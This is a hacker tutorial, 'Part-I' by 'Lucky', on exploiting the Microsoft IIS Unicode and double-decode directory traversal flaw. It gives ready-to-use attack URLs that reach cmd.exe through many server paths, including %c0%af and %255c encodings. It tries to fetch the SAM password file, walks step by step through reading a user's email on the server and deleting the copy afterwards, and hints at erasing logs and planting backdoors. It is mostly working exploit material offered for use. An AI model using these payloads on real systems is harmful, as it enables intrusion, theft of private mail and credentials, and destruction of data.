Microsoft IIS Unicode Exploit Explained -
Part-I
( By Lucky
)
Unicode extensions are installed by default with Microsoft Internet Information Server (IIS) version 4.0 and 5.0. This is to allow characters that are not used in the English language to be recognized by web servers. As we know computers just deal with numbers. It store letters and other characters by assigning a number for each one. Unicode provides a unique number for every character. Unicode forms a single character set across all languages. It's a standard 2-byte or 3-byte character set. The IIS Unicode Exploit allows users to run arbitrary commands on the web server. IIS servers with the Unicode extensions loaded are vulnerable unless they are running current patches.
When can this exploit be used ?
1. A writeable or executable directory is available;
allowing attackers to upload malicious code.
2. A system executable such as
cmd.exe is available on the root and doesn't have an access control list applied
to it.
Now I'll explain you in details how this technique can be used
exploiting servers.
The attack occur when an attacker sends a malformed
URL to a web server that looks something like this:
1.
http://TARGET/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
TARGET
has a virtual executable directory e.g scripts , that is located on the same
driver of Windows system. The directory of C:\ will be revealed !
You must
be wondering what these %255c are ? Well... go on reading I have explained it
later in this article.
2.
http://www.somesite.com/../../../../../winnt/repair/sam._
This one is simple
to understand ; the web server will just look for the file in the web root
directory called "../../../../../winnt/repair/sam._". The '../' tells the web
server to look up one directory , so five '../' 's in a row will make the web
server look in the document root for a file called winnt/repair/sam._. The no.
of '../''s does not matter as long as as there are enough of them to recurse
back to the root of the file system (either c:\ or / on Unix
system)
The IIS Unicode exploit uses the HTTP
protocol and malformed URLs to traverse directories and execute arbitrary
commands on the vulnerable web servers. The IIS Unicode exploit uses a Unicode
representation of a directory delimiter ( / ) to fool IIS . Because the exploit
uses http, it works right from the address bar of a browser. Because of
the non-interactive nature of this exploit, interactive commands such as ftp
& telnet don't work very well. We will see later how it is possible to run
commands interactively using this exploit.
Example of Unicode exploit using a
web browser. Note that the output of the command dir c:\ is
displayed.
Directory of C:\
10/24/2002
01:10p
<DIR>
Documents and Settings
10/24/2002
03:45p
<DIR>
WinNT
10/25/2002
02:21p
<DIR>
Inetpub
10/29/2002
07:05a
<DIR>
Program Files
11/01/2002
10:20a
<DIR>
temp
11/01/2002
11:55a
<DIR>
WebLogs
11/10/2002
01:00p
<DIR>
SQL
11/11/2002
09:45a
webstats.txt
11/11/2002
11:11a
<DIR>
Lucky System
11/12/2002
10:23a
<DIR>
WINNT
11/15/2002
09:30a
<DIR>
Mail
1
File(s)
3,244,232
Bytes
10 Dir(s)
635,474,212 bytes free
Lets go into details....
Say the IP address of
my site www.lucky-web.net is 202.232.54.20 and is running IIS ( which is
not)
To understand the actual attack we will closely examine a sample of the
exploit.
http://202.232.54.20/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
We
notice that the URL calls something from the /scripts directory on the server
www.lucky-web.net For this particular version of exploit the scripts directory
must exist and the path to the executable cmd.exe must be correct.
The next
this we see is ..%c0%af. This string of characters "%c0%af" is an overlong
Unicode representation for ' / '. If this Unicode exploit is loaded on the
server, the URL will be interpreted to
be:
http://202.232.54.20/scripts/../../winnt/system32/cmd.exe?/c+dir+c:\
The URL backs out of the web root, to the root directory of the server, then
calls winnt\system32\cmd.exe. We are using the command interpreter (cmd.exe) to
execute the command 'dir c:\' You can also try running other commands like
ping, netstat, traceroute ...etc.
[Note->Ahh.. You ever thought why this
exploit occurs ? Well it occurs because the CGI routine within the web server
decodes the address twice. First CGI filename will be decoded to check if it is
an executable file ( e.g '.exe' or '.com') After the filename checkup ,
IIS will run another decode process. If you haven't got it, you will understand
it later ...just read on :) ]
We will find that substituting a /
for the %c0%af will result in a '404' error on the web server. ( Tip->
Don't know what 404 error is ? goto www.lucky-web.net/httperror.htm for details ) Thus we can say that IIS checks the path
before interpreting the Unicode /.
In the above URL, "?" after cmd.exe
means argument. In the example given above: http://202.232.54.20/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
the argument is /c which means it carries out the command specified by
string and then terminates. There are many other arguments. Just do cmd.exe/? at
your dos prompt. The "+" indicates the space between arguments.
/..%255c..%255c This decodes to /..\..\ what we are trying
to do here is perform directory traversal.
If you know anything about
Hexadecimal then you would realise that we are sending a hex value to the
server. Just like %20 means space. So we know now that we need to send hex value
, we need to send a \ . Looking at hexadecimal table you will find
that \ is %5c . You might be thinking that if you can use %5c
instead of \ but we cannot because this is checked by IIS and it would mean that
someone is trying to perform directory traversal upon the server. IIS denies the
user access. But luckily it gets checked twice so if we send various hex values
of %, 5, and c we should get \ in return. Using hex table we
find that % = %25
5 = %35
c
= %63
We do not need to send a hex value for each value of %5c..
just as long as we finish up with %5c we will be fine. Now that we know the
hex value we can put them together to get the %5c as required. Let
me give you some examples so that it's clear to
you.
Combinations
Break down of
combinations
--------------
------------------------------------------------------
%255c
%25 = % 5 =
5 c =
c
=> %5c
%%35c
% = %
%35 = 5 c =
c
=>
%5c
%%35%63
% = %
%35 = 5 %63 =
c =>
%5c
%25%35%63 %25
= % %35 =
5 %63 =
c => %5c
Thereby '..\' can be represented by '..%255c' , '..%%35c' etc. After first decoding, '..%255c' is turned into '..%5c' IIS will take it as legal character string that can pass security checkup. But after a second decode process, it will be reverted to '..\' . Hmm... now you understand ?? I'm sure you know why I'm asking this :) Hint: twice decode.
Lets move deep with various syntax & tricks
There are *many* vulnerabilities with IIS but I'm going
to discuss few . Wait for my IIS Unicode Exploit Part-II
article to be released later ....moreover I don't know ALL - LoL !
http://IP
ADDRESS/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://IP
ADDRESS/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://IP
ADDRESS/cgi-bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://IP
ADDRESS/iisadmpwd/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://IP
ADDRESS/samples/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://IP
ADDRESS/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://IP
ADDRESS/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
http://IP
ADDRESS/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
Recall/see
again the example I gave you earlier - the output of the command 'dir
c:\' shown in the web browser.
To navigate just change the links to
/system32/cmd.exe?/c+dir+c:\Inetpub to navigate Inetpub directory.
Say
there is mail system at my site and under Mail directory there are
subdirectories :
username_lucky-web.net\inbox\
Under inbox
directory there are many .eml files which you want to read. Lets assume
username is lucky and the eml file be 05215ac98el136b61450dle8b2.eml
So what are we waiting for ? Lets read the mail ! ( ohh ! I must delete all my
gf's email ! LOL ) What I did is gave the full path to that eml
file: http://202.232.54.20/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\Mail\lucky_lucky-web.net\inbox\05215ac98el136b61450dle8b2.eml
The output I got is :
Showing Directory of
c:\Mail\lucky_lucky-web.net\inbox\
10/10/2002
07:58a
2,244
05215ac98el136b61450dle8b2.eml
1
File(s)
2,244
bytes
0 Dir(s) 23,234,544,239
bytes free
I even downloaded the eml file by using a download
manager , then changed it to .txt , but this also didn't help , I got the same
thing.. This means you cannot read these files directly . So what we
do is copy the eml file to c:\ of the web server named as mail.txt .
We write it as
:
http://202.232.54.20/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\Mail\lucky_lucky-web.net\inbox\05215ac98el136b61450dle8b2.eml+mail.txt
This also didn't work !! Do you know why ? how can you access
such a long eml file from command prompt ?? First get the DOS 8.3 format .
For that give
<path>\Mail\lucky_lucky-web.net\inbox\/x note-> /x
gives you the file names in 8.3 format. Again
http://202.232.54.20/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\Mail\lucky_lucky-web.net\inbox\/x
We
get the file name as 05215A~1.EML
Now ,
http://202.232.54.20/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\Mail\lucky_lucky-web.net\inbox\05215A~1.EML+mail.txt
We Get :
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
1 file(s) copied
Voila !! we got it ! we have copied the
mail.txt to c:\
just using simply
http://202.232.54.20/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+type+c:\mail.txt
Now
you can see the contains of it :)
Remember to delete the file after reading
http://202.232.54.20/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+del+c:\mail.txt
You
can try out simple commands like this. I hope you got the idea !
The
basic Unicode commands are :
- dir : list a directory
- dir/x : list it in dos
form ~ (8.3)
- call : starts a exe
- start : starts a exe
- del
: deletes a file
- type : view files
- copy : copies a file
- /c :
sends the commands to a shell that terminates
upon completion.
- /s : show the results
- /S : do a research
- /h : run a file in hidden mode
- echo : it orders to
write the commands in a textual file.
Here I come to the end of this article. Isn't it simple ? heh ! You also try to experiment with these... shhh.. wait you haven't learned yet how to delete the log files ! So BeWare ! I didn't want to make this article too long( as I'm lazy) so I have divided this into two parts . The next part ( Part II) will be more interesting part as we will see how to use Exploit through string vulnerabilities, run & upload a back door, TFTP exploit method and ofcourse how to delete the logs and lots more.... :) I'll start writting ASAP.
By- Lucky
Lucky@lucky-web.net
http://www.lucky-web.net/
To
receive tutorials/manuals join the mailing list by sending a blank email
to : members_luckyweb-subscribe@egroups.com